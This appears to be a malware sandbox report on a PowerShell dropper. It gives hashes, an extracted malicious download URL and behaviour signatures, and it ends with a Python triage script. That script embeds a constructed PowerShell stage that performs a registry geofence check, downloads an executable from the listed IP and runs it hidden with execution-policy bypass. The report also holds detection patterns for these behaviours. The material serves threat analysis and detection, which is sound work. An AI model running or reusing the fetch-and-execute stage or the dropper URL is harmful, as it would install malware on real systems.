General

  • Target

    2025-07-02_dce86a2457eda216c8e6ee129149e4a4_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer

  • Size

    938KB

  • Sample

    250702-xkl36aaj2z

  • MD5

    dce86a2457eda216c8e6ee129149e4a4

  • SHA1

    47c1672677fe2135770a91d61b46b8670410e6fa

  • SHA256

    eff7894d88308fbbc98576ebb0968b015f3e9d8bb9b4ab1bf965ac70fa699cc9

  • SHA512

    729dd1975e7d0b49a7fea740d558115fb89a62815701597d164771ee2749063534e0fd8e5d4bb5dfb01ae53e5d1b232a34cf0f3bb2ae7ca71ac6c5b19289ba23

  • SSDEEP

    24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8a9VE:6TvC/MTQYxsWR7a9V

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    exe.dropper: http://185.156.72.2/testmine/random.exe

Targets

    • Target

      2025-07-02_dce86a2457eda216c8e6ee129149e4a4_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell is launched with its display window hidden, so no console is visible to the user.

    • Checks computer location settings

      Looks up the country code configured in the registry, which is likely a geofence check.

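The report lists only the signature names, the extracted exe.dropper URL and the file digests. The script below is an added example, not the sandbox's code and not the sample's actual PowerShell stage: it runs the same three checks the signatures describe (hidden-window PowerShell invocation, registry country-code lookup, download of an executable payload) over a constructed stand-in ps1 script, and cross-checks a locally obtained file against the digests listed in General. The stand-in script, the regex patterns and the scoring are assumptions; only the dropper URL and the hashes come from the report.

```python
"""Static triage of a deobfuscated PowerShell dropper stage (added example)."""
import hashlib
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Digests copied from the report, so a locally obtained file can be verified
# against the analysed sample before any further work is done on it.
REPORT_HASHES = {
    "md5": "dce86a2457eda216c8e6ee129149e4a4",
    "sha1": "47c1672677fe2135770a91d61b46b8670410e6fa",
    "sha256": "eff7894d88308fbbc98576ebb0968b015f3e9d8bb9b4ab1bf965ac70fa699cc9",
    "sha512": "729dd1975e7d0b49a7fea740d558115fb89a62815701597d164771ee2749063534e0fd8e5d4bb5dfb01ae53e5d1b232a34cf0f3bb2ae7ca71ac6c5b19289ba23",
}

# CONSTRUCTED stand-in for a deobfuscated ps1 stage. Only the URL is taken from
# the report; every other line is an assumption written to exercise the checks.
SAMPLE_PS1 = r"""
$geo = (Get-ItemProperty 'HKCU:\Control Panel\International\Geo').Nation
if ($geo -eq '7') { exit }
$u = 'http://185.156.72.2/testmine/random.exe'
$p = "$env:APPDATA\random.exe"
(New-Object Net.WebClient).DownloadFile($u, $p)
Start-Process powershell.exe -WindowStyle Hidden -ArgumentList "-ep bypass -file $p"
"""

PAYLOAD_EXTS = (".exe", ".dll", ".scr", ".ps1", ".bat", ".vbs", ".hta", ".msi")
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)


def _prefixes(word: str) -> str:
    """Alternation of every abbreviation PowerShell accepts for a parameter name."""
    return "|".join(word[:i] for i in range(len(word), 0, -1))


# powershell.exe -w hidden / -WindowStyle Hidden, Start-Process -WindowStyle Hidden
# and $psi.WindowStyle = 'Hidden' all leave the user without a visible console.
HIDDEN_RE = re.compile(
    r"(?:-(?:%s)\s+|windowstyle\s*=\s*['\"]?)hidden\b" % _prefixes("windowstyle"),
    re.IGNORECASE,
)

# Registry key and APIs Windows uses for the configured country (GeoID / Nation).
GEO_RE = re.compile(
    r"Control Panel\\International|Get-WinHomeLocation|GetUserGeoID|\bGeoID\b|\bNation\b",
    re.IGNORECASE,
)


@dataclass
class Findings:
    dropper_urls: list = field(default_factory=list)  # the report's exe.dropper label
    other_urls: list = field(default_factory=list)
    hidden_window: bool = False
    geo_check: bool = False

    def score(self) -> int:
        """Rough severity: each flagged behaviour adds one point (assumed weighting)."""
        return int(bool(self.dropper_urls)) + int(self.hidden_window) + int(self.geo_check)


def triage_ps1(script: str) -> Findings:
    """Run the three report checks over a deobfuscated script and classify its URLs."""
    f = Findings()
    for url in URL_RE.findall(script):
        url = url.rstrip(".,;)")
        path = urlparse(url).path.lower()
        (f.dropper_urls if path.endswith(PAYLOAD_EXTS) else f.other_urls).append(url)
    f.hidden_window = HIDDEN_RE.search(script) is not None
    f.geo_check = GEO_RE.search(script) is not None
    return f


def digests(data: bytes) -> dict:
    """Same four digests the report lists, computed over local bytes."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in REPORT_HASHES}


def matches_report(data: bytes) -> set:
    """Names of the report digests a local file reproduces; all four only for the real sample."""
    local = digests(data)
    return {algo for algo, h in REPORT_HASHES.items() if local[algo] == h}


if __name__ == "__main__":
    found = triage_ps1(SAMPLE_PS1)
    print(f"dropper URLs : {found.dropper_urls}")
    print(f"hidden window: {found.hidden_window}")
    print(f"geo check    : {found.geo_check}")
    print(f"score        : {found.score()}/3")
```

Run it against a real deobfuscated stage with `triage_ps1(open(path).read())`, and confirm the artefact with `matches_report(open(path, "rb").read())`, which returns all four digest names only for the file this report describes. A positive geo check is also a detonation caveat: a sandbox whose configured country matches the value the script excludes will see no download, so the dropper URL is best confirmed statically as above rather than waited for in dynamic traffic.
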
MITRE ATT&CK Enterprise v16